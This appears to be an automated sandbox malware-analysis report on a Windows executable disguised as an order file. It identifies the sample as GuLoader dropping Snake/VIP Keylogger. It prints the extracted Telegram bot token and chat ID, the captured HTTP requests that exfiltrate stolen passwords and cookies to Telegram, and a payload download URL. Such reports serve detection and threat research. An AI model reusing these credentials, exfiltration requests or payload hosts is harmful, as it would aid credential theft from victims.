Windows Analysis Report
ORDER 20240986 OA.exe

Overview

General Information

Sample name: ORDER 20240986 OA.exe
Analysis ID: 1559976
MD5: 9f036462b07002efdf646b0995217bbd
SHA1: fbfd528f12735ecfa48f4d0fde42aef883e1c678
SHA256: 491cf03511ae77ed758d9b36f3237da0ef099370144ed61367146fee1c2bacee
Tags: exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8", "Chat_id": "6553726543", "Version": "4.4"}
Source: ORDER 20240986 OA.exe.7832.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendMessage"}
Multi AV Scanner detection for submitted file
Source: ORDER 20240986 OA.exe ReversingLabs: Detection: 44%
Source: ORDER 20240986 OA.exe Virustotal: Detection: 33% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: ORDER 20240986 OA.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE887A8 CryptUnprotectData, 4_2_3AE887A8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE88EF1 CryptUnprotectData, 4_2_3AE88EF1
Uses 32bit PE files
Source: ORDER 20240986 OA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49800 version: TLS 1.0
Source: unknown HTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: ORDER 20240986 OA.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00402868 FindFirstFileW, 4_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004065DA FindFirstFileW,FindClose, 4_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004059A9
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0015F45Dh 4_2_0015F2C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0015F45Dh 4_2_0015F4AC
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0015FC19h 4_2_0015F961
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07566970h 4_2_07566678
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568AE8h 4_2_075687F0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756C448h 4_2_0756C150
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07563E26h 4_2_07563B58
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756EF50h 4_2_0756EC58
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756030Eh 4_2_07560040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07566E38h 4_2_07566B40
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07565E16h 4_2_07565B48
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07569940h 4_2_07569648
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756D768h 4_2_0756D470
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07564746h 4_2_07564478
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07560C2Eh 4_2_07560960
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568158h 4_2_07567E60
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756AC60h 4_2_0756A968
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075619DEh 4_2_07561710
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07569E08h 4_2_07569B10
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07562BE6h 4_2_07562918
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756C910h 4_2_0756C618
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756E0F8h 4_2_0756DE00
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07564BD7h 4_2_07564908
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07567300h 4_2_07567008
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756B128h 4_2_0756AE30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07563506h 4_2_07563238
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756DC30h 4_2_0756D938
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756F418h 4_2_0756F120
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075654F6h 4_2_07565228
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568620h 4_2_07568328
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756079Eh 4_2_075604D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075677C8h 4_2_075674D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07566347h 4_2_07565FD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756A2D0h 4_2_07569FD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756BAB8h 4_2_0756B7C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756E5C0h 4_2_0756E2C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075610BEh 4_2_07560DF0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075622C6h 4_2_07561FF8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756B5F0h 4_2_0756B2F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756CDD8h 4_2_0756CAE0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 075642B6h 4_2_07563FE8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756F8E0h 4_2_0756F5E8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756EA88h 4_2_0756E790
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07565066h 4_2_07564D98
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07567C90h 4_2_07567998
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756154Eh 4_2_07561280
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07569478h 4_2_07569180
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07562756h 4_2_07562488
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756BF80h 4_2_0756BC88
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756FDA8h 4_2_0756FAB0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07565986h 4_2_075656B8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07568FB0h 4_2_07568CB8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07561E47h 4_2_07561BA0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756A798h 4_2_0756A4A0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07563076h 4_2_07562DA8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 0756D2A0h 4_2_0756CFA8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621FE8h 4_2_07621CF0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621658h 4_2_07621360
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07620801h 4_2_07620508
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07620CC8h 4_2_076209D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07620338h 4_2_07620040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621B20h 4_2_07621828
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 07621190h 4_2_07620E98
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07663E70
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07663E60
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07660A03
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_07660A10
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9E0A9h 4_2_3AC9DE00
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC931E0h 4_2_3AC92DC8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC92C19h 4_2_3AC92968
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9E959h 4_2_3AC9E6B0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9E501h 4_2_3AC9E258
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9F661h 4_2_3AC9F3B8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9F209h 4_2_3AC9EF60
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9EDB1h 4_2_3AC9EB08
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC90D0Dh 4_2_3AC90B30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC91697h 4_2_3AC90B30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9D3A1h 4_2_3AC9D0F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9CF49h 4_2_3AC9CCA0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_3AC90040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9FAB9h 4_2_3AC9F810
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9DC51h 4_2_3AC9D9A8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC931E0h 4_2_3AC92DB8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC9D7F9h 4_2_3AC9D550
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AC931E0h 4_2_3AC9310E
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE89280h 4_2_3AE88FB0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE87EB5h 4_2_3AE87B78
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE81449h 4_2_3AE811A0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8F5C6h 4_2_3AE8F2F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE87571h 4_2_3AE872C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE85179h 4_2_3AE84ED0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE82151h 4_2_3AE81EA8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8F136h 4_2_3AE8EE68
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8D146h 4_2_3AE8CE78
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE84D21h 4_2_3AE84A78
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE87119h 4_2_3AE86E70
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE81CF9h 4_2_3AE81A50
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE848C9h 4_2_3AE84620
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE86CC1h 4_2_3AE86A18
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE85E81h 4_2_3AE85BD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8BA76h 4_2_3AE8B7A8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE82E59h 4_2_3AE82BB0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8FA56h 4_2_3AE8F788
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE85A29h 4_2_3AE85780
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8DA66h 4_2_3AE8D798
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE82A01h 4_2_3AE82758
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE855D1h 4_2_3AE85328
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE879C9h 4_2_3AE87720
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8D5D6h 4_2_3AE8D308
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE825A9h 4_2_3AE82300
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8B5E6h 4_2_3AE8B318
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE80B99h 4_2_3AE808F0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8C396h 4_2_3AE8C0C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8E386h 4_2_3AE8E0B8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE86733h 4_2_3AE86488
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then mov esp, ebp 4_2_3AE8B081
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE80741h 4_2_3AE80498
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE83709h 4_2_3AE83460
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE802E9h 4_2_3AE80040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8DEF6h 4_2_3AE8DC28
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8BF06h 4_2_3AE8BC38
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE862D9h 4_2_3AE86030
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE832B1h 4_2_3AE83008
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8CCB6h 4_2_3AE8C9E8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE818A1h 4_2_3AE815F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then mov esp, ebp 4_2_3AE8B1C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8ECA6h 4_2_3AE8E9D8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE80FF1h 4_2_3AE80D48
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8E816h 4_2_3AE8E548
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4x nop then jmp 3AE8C826h 4_2_3AE8C558

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a7224cc3aHost: api.telegram.orgContent-Length: 580
Source: global traffic HTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b6f4848dbcfHost: api.telegram.orgContent-Length: 7045
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49794 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49812 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49783 -> 167.250.5.91:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yak/ZnWGURK2.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sierrassinfinusadas.com.arCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49800 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /yak/ZnWGURK2.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sierrassinfinusadas.com.arCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
